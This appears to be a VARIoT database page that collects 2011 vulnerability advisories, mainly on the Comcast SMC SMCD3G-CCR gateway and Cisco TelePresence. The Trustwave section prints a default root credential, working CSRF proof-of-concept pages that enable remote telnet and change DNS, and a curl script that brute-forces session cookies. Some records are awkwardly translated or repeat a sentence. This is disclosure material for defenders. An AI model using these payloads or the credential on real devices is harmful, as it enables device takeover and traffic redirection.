VARIoT IoT vulnerabilities database

A certain Comcast Business Gateway configuration of the SMC SMCD3G-CCR with firmware before 1.4.0.49.2 has a default password of D0nt4g3tme for the mso account, which makes it easier for remote attackers to obtain administrative access via the (1) web interface or (2) TELNET interface. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways. Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible. Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: SMC SMCD3G-CCR Two Vulnerabilities SECUNIA ADVISORY ID: SA43199 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43199/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43199 RELEASE DATE: 2011-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/43199/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43199/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43199 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can be exploited by malicious people to conduct brute force and cross-site request forgery attacks. 1) The web management application generates session identifiers incrementally, which can be exploited to brute force a valid session identifier via the "userid" cookie. 2) The web management application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. enable management via Telnet by tricking an administrator into visiting a malicious web site while being logged-in to the application. SOLUTION: Reportedly fixed in firmware version 1.4.0.49.2. PROVIDED AND/OR DISCOVERED BY: Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs. ORIGINAL ADVISORY: Trustwave's SpiderLabs (TWSL2011-002): https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Trustwave's SpiderLabs Security Advisory TWSL2011-001: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR) https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com) Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR Version affected: Versions prior to 1.4.0.49.2 Product description: The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of cable internet services for Comcast Business Class customers with enhanced services including Network Address Translation (NAT), firewalling, and Virtual Private Network (VPN) termination. Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs Finding 1: Static Credentials CVE: CVE-2011-0885 All SMCD3G-CCR gateways provided by Comcast have an administrative login of "mso" with the password of "D0nt4g3tme". These passwords are not provided as a part of the installation of the device and are not recommended to be changed, thus the majority of users are unaware of the default configuration. With these default credentials, internal attackers can modify device configurations to leverage more significant attacks, including redirection of DNS requests, creation of a remote VPN termination point, and modification of NAT entries. These credentials provide access to the web interface for management, as well as a telnet interface that provides shell access to the device. The mso login provides shell as UID 0 (root). Finding 2: Cross Site Request Forgery (CSRF) CVE: CVE-2011-0886 SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against numerous management pages allowing an attacker to embed in a webpage a malicious request against the gateway's management interface. Through this, an attacker can modify device configuration and enable remote administration via a telnet shell and http. The following Proof of Concept (PoC) connects to the gateway, logs in, modifies the remote administration to allow any user to connect externally, and modifies the DNS information. ## smcd3g-csrf-poc.htm <html> <body> <iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1"> </iframe> <iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1"> </iframe> <iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1"> </iframe> </body> </html> ## smcd3g-csrf-poc-1.htm <html> <body> <form action="http://10.1.10.1/goform/login" method="post" name="tF"> <input type="hidden" name="user" value="mso" /> <input type="hidden" name="pws" value="D0nt4g3tme" /> </form> <script> document.tF.submit(); </script> </body> </html> ## smcd3g-csrf-poc-2.htm <html> <body> <form action="http://10.1.10.1/goform/RemoteRange" name="RMangement" method="post"> <input type="hidden" value="feat-admin-remote" name="file"> <input type="hidden" value="admin/" name="dir"> <input type="hidden" name="RemoteRange" value="0" /> <input type="hidden" name="rm_access" value="on" /> <input type="hidden" name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input type="hidden" name="http_port" value="8080" /> <input type="hidden" name="http_enable" value="on" /> <input type="hidden" name="http_flag" value="1" /> <input type="hidden" name="msoremote_enableCheck" value="on" /> <input type="hidden" name="mso_remote_enable" value="1" /> <input type="hidden" name="remote_enable" value="0" /> <input type="hidden" name="https_enable" value="on" /> <input type="hidden" name="https_port" value="8181" /> <input type="hidden" name="https_flag" value="1" /> <input type="hidden" name="telnet_enable" value="on" /> <input type="hidden" name="telnet_port" value="2323" /> <input type="hidden" name="telnet_flag" value="1" /> <input type="hidden" name="Remote1=" value="" /> </form> </body> </html> <script> setTimeout("document.RMangement.submit()",4000); </script> </body> </html> ## smcd3g-csrf-poc-3.htm <html> <body> <form name="WanIPform" action="http://10.1.10.1/goform/Basic" method="post"> <input type="hidden" value="feat-wan-ip" name="file"> <input type="hidden" value="admin/" name="dir"> <input type="hidden" value="Fixed" name="DNSAssign"> <input type="hidden" value="0" name="dhcpc_release"> <input type="hidden" value="0" name="dhcpc_renew"> <input type="hidden" value="" name="domain_name"> <input type="hidden" value="" name="WDn"> <input type="hidden" name="SysName" value="" /> <input type="hidden" name="manual_dns_enable" value="on" /> <input type="hidden" name="DAddr" value="4.2.2.1" /> <input type="hidden" name="DAddr0" value="4" /> <input type="hidden" name="DAddr1" value="2" /> <input type="hidden" name="DAddr2" value="2" /> <input type="hidden" name="DAddr3" value="1" /> <input type="hidden" name="PDAddr" value="4.2.2.2" /> <input type="hidden" name="PDAddr0" value="4" /> <input type="hidden" name="PDAddr1" value="2" /> <input type="hidden" name="PDAddr2" value="2" /> <input type="hidden" name="PDAddr3" value="2" /> </form> <script> setTimeout("document.WanIPform.submit()",5000); </script> </body> </html> If the PoC was embedded in any web page the targeted user visited while logged into the device, the attacker would be provided remote administration in to the gateway device include a telnet shell. This would allow the attacker to redirect traffic to a malicious end-point. Finding 3: Weak Session Management CVE: CVE-2011-0887 SMCD3G-CCR gateways provided by Comcast utilize a predictable value to validate the active web management portal session. The epoch time of beginning of the session is stored as a cookie labeled "userid". This provides a predictable range of session IDs that can be brute-forced. The following PoC attempts to brute force the session IDs by requesting the admin page with an incrementing cookie and determining whether it wants to redirect to login.asp. ## smcd3g-session-poc.sh #!/bin/bash start=1267604160 end=1267605960 for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt "1" ] then echo "Session ID Found: $i" fi if [ $(($i % 100)) -eq "0" ] then echo "Currently at $i" fi done Through this, an attacker can brute-force the possible valid session IDs. Sessions do by default expire within 10 minutes, thus the attack window is limited but can be leveraged with other attack methods. Vendor Response: These issues have been addressed as of version 1.4.0.49.2 Remediation Steps: In order to determine if the correct version is installed, users should view the "About" link in the management interface. Versions 1.4.0.49.2 and above have been corrected. Vendor Communication Timeline: 08/30/10 - Vulnerability disclosed 01/21/11 - Patch Released 02/04/11 - Advisory Published Revision History: 1.0 Initial publication References 1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Moxa Device Manager is a remote management tool for Moxa's embedded computers. The \"MDMUtil.dll\" module has a boundary error when processing certain messages, tempting the user to link to a malicious MDM gateway to trigger a stack-based buffer overflow. Successful exploitation of a vulnerability can execute arbitrary instructions in an application security context. Failed exploit attempts will result in a denial-of-service condition

The administrative web interface on Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote attackers to create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request, aka Bug IDs CSCth85786 and CSCth61065. The problem is Bug IDs CSCth85786 and CSCth61065 It is a problem.A third party could create or overwrite arbitrary files and execute arbitrary code through crafted requests. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. Unauthenticated remote attackers can send trait requests to affected devices, allowing arbitrary content files to be created anywhere on the device. To exploit this vulnerability, an attacker could send a specially crafted request to the devices TCP ports 80 and 443. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary files on the webserver. This issue is tracked by Cisco bug IDs CSCth85786 and CSCth61065. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. The Cisco TelePresence implementation does not properly filter user-supplied input. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Recording Server Advisory ID: cisco-sa-20110223-telepresence-ctrs Revision 1.0 For Public Release 2011 February 23 1600 UTC (GMT) +--------------------------------------------------------------------- Summary ======= Multiple vulnerabilities exist within the Cisco TelePresence Recording Server. The defect that is related to each component is covered in each associated advisory. The defect that is related to each component is covered in each associated advisory. The defect that is related to each component is covered in each associated advisory. The defect that is related to each component is covered in each associated advisory. All releases of Cisco TelePresence software prior to 1.7.1 are affected by one or more of the vulnerabilities listed in this advisory. To determine the current version of software that is running on the Cisco TelePresence Recording Server, SSH into the device and issue the show version active and the show version inactive commands. The output should resemble the following example: admin: show version active Active Master Version: 1.7.0.0-151 Active Version Installed Software Options: No Installed Software Options Found. admin: show version inactive Inactive Master Version: 1.6.2.0-237 Inactive Version Installed Software Options: No Installed Software Options Found. In the preceding example, the system has versions 1.6.2 and 1.7.0 loaded on the device and version 1.7.0 is currently active. A device is affected only by vulnerabilities that are present in the active software version. Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The Cisco TelePresence solution allows for immersive, in-person communication and collaboration over the network with colleagues, prospects, and partners even when they are located in opposite hemispheres. These vulnerabilities are independent of each other. Unauthenticated Java Servlet Access +---------------------------------- A number of sensitive Java Servlets delivered via a Java Servlet framework within the Cisco TelePresence Recording Server could allow a remote, unauthenticated attacker to perform actions that should be restricted to administrative users. * Cisco TelePresence Recording Server - CSCtf42005 ( registered customers only) has been assigned the CVE identifier CVE-2011-0383. * Cisco TelePresence Recording Server - CSCtf97221 ( registered customers only) has been assigned the CVE identifier CVE-2011-0382. * Cisco TelePresence Recording Server - CSCth85786 ( registered customers only) has been assigned the CVE identifier CVE-2011-0385. This vulnerability could be leveraged to obtain full control of the affected device. * Cisco TelePresence Recording Server - CSCti50739 ( registered customers only) has been assigned the CVE identifier CVE-2011-0386. This vulnerability could allow an unauthenticated, adjacent attacker to trigger a buffer overflow condition. Because Cisco Discovery Protocol works at the data-link layer (Layer 2), an attacker must have a way to submit an Ethernet frame directly to an affected device. This may be possible in situations where the affected system is part of a bridged network or connected to a nonpartitioned device such as a network hub. * Cisco TelePresence Recording Server - CSCtd75769 ( registered customers only) has been assigned the CVE identifier CVE-2011-0379. Ad Hoc Recording Denial of Service +--------------------------------- A denial of service vulnerability exists within Cisco TelePresence Recording Server devices. A restart of the affected device may be required to regain functionality. * Cisco TelePresence Recording Server - CSCtf97205 ( registered customers only) has been assigned the CVE identifier CVE-2011-0391. Java RMI Denial of Service +------------------------- A denial of service vulnerability exists within Cisco TelePresence Recording Server devices due to a failure to properly restrict access to the RMI interface of the Java Servlet framework. An unauthenticated, remote attacker could trigger an out-of-memory condition on the Servlet host by issuing a series of crafted requests. * Cisco TelePresence Recording Server - CSCtg35830 ( registered customers only) has been assigned the CVE identifier CVE-2011-0388. This vulnerability could allow an unauthenticated, remote attacker to perform a limited number of actions on the system that should be restricted to authorized users. * Cisco TelePresence Recording Server - CSCtg35833 ( registered customers only) has been assigned the CVE identifier CVE-2011-0392. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Cisco Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss. * CSCtf42005 - Unauthenticated Java Servlet Access CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCtf97221 - CGI Command Injection CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCth85786 - Unauthenticated Arbitrary File Upload CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCti50739 - XML-RPC Arbitrary File Overwrite CVSS Base Score - 9.3 Access Vector - Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.7 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCtd75769 - Cisco Discovery Protocol Remote Code Execution CVSS Base Score - 7.9 Access Vector - Adjacent Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 6.5 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCtf97205 - Ad Hoc Recording Denial of Service CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCtg35830 - Java RMI Denial of Service CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCtg35833 - Unauthenticated XML-RPC Interface CVSS Base Score - 7.5 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Partial Integrity Impact - Partial Availability Impact - Partial CVSS Temporal Score - 6.2 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the Unauthenticated Java Servlet Access (CSCtf42005) vulnerability could allow an unauthenticated, remote attacker to take complete control of the affected device or system. This may allow the attacker to gain full control of the affected device. In some instances this issue could be leveraged to gain complete control of the affected system. Successful exploitation of the Cisco Discovery Protocol Remote Code Execution (CSCtd75769) vulnerability could allow an unauthenticated, adjacent attacker to take complete control of the affected system. Successful exploitation of the Ad Hoc Recording Denial of Service (CSCtf97205) vulnerability could allow an unauthenticated, remote attacker to cause a persistent denial of service condition on an affected device. Successful exploitation of the Java RMI Denial of Service (CSCtg35830) vulnerability could allow an unauthenticated, remote attacker to cause all web-based services to become inaccessible. Successful exploitation of the Unauthenticated XML-RPC Interface (CSCtg35833) vulnerability could allow an unauthenticated, remote attacker to perform a number of actions that should be restricted to authenticated users. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Each row of the following Cisco TelePresence System Software table defines a specific defect, the first fixed release, and the recommended release to resolve all the security issues identified in this advisory as well as other non-security-related issues. Cisco recommends upgrading to a release equal to or later than the release in the Recommended Release column of the table. Workarounds =========== There are no device- or system-based workarounds for the identified vulnerabilities. Additional mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Intelligence companion document for this advisory: http://www.cisco.com/warp/public/707/cisco-amb-20110223-telepresence.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. All vulnerabilities identified within this Security Advisory were discovered internally by Cisco. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20110223-telepresence-ctrs.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2011-February-23 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iF4EAREIAAYFAk1lHp0ACgkQQXnnBKKRMNDi6gD9FHcn7qE/BjeRZk7WFzDaN7m/ +eea5C4SM6kS1uQK5DoA/152WnbmatSGw6hJP/e2MSmWOqU1IKU5oxZOO8uqrShf =xAVI -----END PGP SIGNATURE----- . Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-February-23 | public | | | | release

Stack-based buffer overflow in MDMUtil.dll in MDMTool.exe in MDM Tool before 2.3 in Moxa Device Manager allows remote MDM Gateways to execute arbitrary code via crafted data in a session on TCP port 54321. An attacker may exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will likely cause denial-of-service conditions

WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms have a default username and password, which makes it easier for remote attackers to obtain superadmin access via the web interface, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 There are multiple vulnerabilities in products that run on the platform, including directory traversal. Other NB100 and NB200 Products that run on the platform may also be affected.By a third party with access to the product, superadmin Authority (Netbiter Top-level permissions ) By acquiring, system files and configuration files may be browsed. In addition, an arbitrary command may be executed by uploading malicious code. A remote attacker can gain access to the super administrator through the web interface

Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the page parameter, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Contains a directory traversal vulnerability

cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to execute arbitrary code by using a config.html 2.conf action to replace the logo page's GIF image file with a file containing this code, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter products based on the NB100 and NB200 platforms contain multiple vulnerabilities. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Is A vulnerability that allows arbitrary code execution exists

Absolute path traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a full pathname in the file parameter, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter products based on the NB100 and NB200 platforms contain multiple vulnerabilities. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Is An absolute path traversal vulnerability exists

Google Chrome before 9.0.597.84 on Mac OS X does not properly mitigate an unspecified flaw in the Mac OS X 10.5 SSL libraries, which allows remote attackers to cause a denial of service (application crash) via unknown vectors. Google Chrome is prone to multiple vulnerabilities. Attackers may exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks are also possible. Chrome versions prior to 9.0.597.84 are vulnerable. Google Chrome is a web browser developed by Google (Google)

The sandbox implementation in Google Chrome before 9.0.597.84 on Mac OS X might allow remote attackers to obtain potentially sensitive information about local files via vectors related to the stat system call. Google Chrome is prone to multiple vulnerabilities. Attackers may exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks are also possible. Chrome versions prior to 9.0.597.84 are vulnerable. Google Chrome is a web browser developed by Google (Google)

Hitachi JP1/NETM/DM is prone to a local information-disclosure vulnerability and a denial-of-service vulnerability. Successfully exploiting these issues may allow an attacker to obtain sensitive information or cause the affected application to crash, denying service to legitimate users. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Hitachi JP1/NETM/DM Products Two Vulnerabilities SECUNIA ADVISORY ID: SA43140 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43140/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43140 RELEASE DATE: 2011-02-01 DISCUSS ADVISORY: http://secunia.com/advisories/43140/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43140/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43140 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in various Hitachi products, which can be exploited by malicious, local users to potentially gain knowledge of sensitive information and malicious people to cause a DoS (Denial of Service). 1) The permissions for certain files are not properly set, which allows local users to access files that they are not intended to access. 2) An unspecified error can be exploited to cause a DoS. SOLUTION: Update to fixed versions (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: HS11-001 (Japanese): http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-001/index.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories 